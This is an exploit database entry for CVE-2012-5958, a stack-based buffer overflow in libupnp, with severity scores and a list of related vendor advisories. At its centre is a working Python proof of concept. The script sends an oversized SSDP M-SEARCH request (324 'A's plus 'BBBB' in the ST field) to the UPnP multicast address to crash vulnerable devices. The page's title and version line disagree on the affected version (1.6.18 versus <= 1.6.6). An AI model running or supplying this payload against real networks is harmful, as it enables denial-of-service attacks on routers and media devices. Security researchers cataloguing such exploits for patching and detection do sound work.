Lucene search
Patrik Lantz1337DAY-ID-35332HistoryNov 27, 2020 - 12:00 a.m.
libupnp 1.6.18 - Stack-based buffer overflow Exploit
2020-11-2700:00:00
Patrik Lantz
0day.today
39
6.3 Medium
AI Score
Confidence
Low
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958
import socket
payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
Related
checkpoint_advisories
checkpoint_advisories
prion
prion
Stack overflow
2013-01-31 21:55:00
debiancve
debiancve
CVE-2012-5958
2013-01-31 21:55:00
packetstorm
packetstorm
libupnp 1.6.18 Denial Of Service
2020-11-26 00:00:00
cve
cve
CVE-2012-5958
2013-01-31 21:55:00
ubuntucve
ubuntucve
CVE-2012-5958
2013-01-31 00:00:00
exploitdb
exploitdb
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
2020-11-27 00:00:00
nessus
nessus
GLSA-201403-06 : libupnp: Arbitrary code execution
2014-03-27 00:00:00
Fedora 17 : mediatomb-0.12.1-23.fc17 (2013-2352)
2013-02-21 00:00:00
Debian DSA-2614-1 : libupnp - several vulnerabilities
2013-02-04 00:00:00
gentoo
gentoo
libupnp: Arbitrary code execution
2014-03-26 00:00:00
openvas
openvas
Gentoo Security Advisory GLSA 201403-06
2015-09-29 00:00:00
libupnp Multiple Buffer Overflow Vulnerabilities (TCP)
2013-02-06 00:00:00
Debian Security Advisory DSA 2615-1 (libupnp4 - several vulnerabilities)
2013-02-01 00:00:00
metasploit
metasploit
UPnP SSDP M-SEARCH Information Discovery
2010-11-09 06:24:32
myhack58
myhack58
fedora
fedora
[SECURITY] Fedora 18 Update: libupnp-1.6.18-1.fc18
2013-02-12 05:32:58
[SECURITY] Fedora 18 Update: mediatomb-0.12.1-23.fc18
2013-02-21 05:32:14
[SECURITY] Fedora 17 Update: mediatomb-0.12.1-23.fc17
2013-02-21 05:48:15
securityvulns
securityvulns
Broadcom chipset routers format string vulnerability
2013-02-11 00:00:00
debian
debian
[SECURITY] [DSA 2614-1] libupnp security update
2013-02-02 10:17:31
[SECURITY] [DSA 2615-1] libupnp4 security update
2013-02-02 11:22:39
cert
cert
cisco
cisco
Portable SDK for UPnP Devices Contains Buffer Overflow Vulnerabilities
2013-01-29 20:00:00
attackerkb
attackerkb
UPnP unique_service_name Buffer Overflow
2013-01-31 00:00:00
freebsd
freebsd
upnp -- multiple vulnerabilities
2012-11-21 00:00:00
6.3 Medium
AI Score
Confidence
Low
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
Related for 1337DAY-ID-35332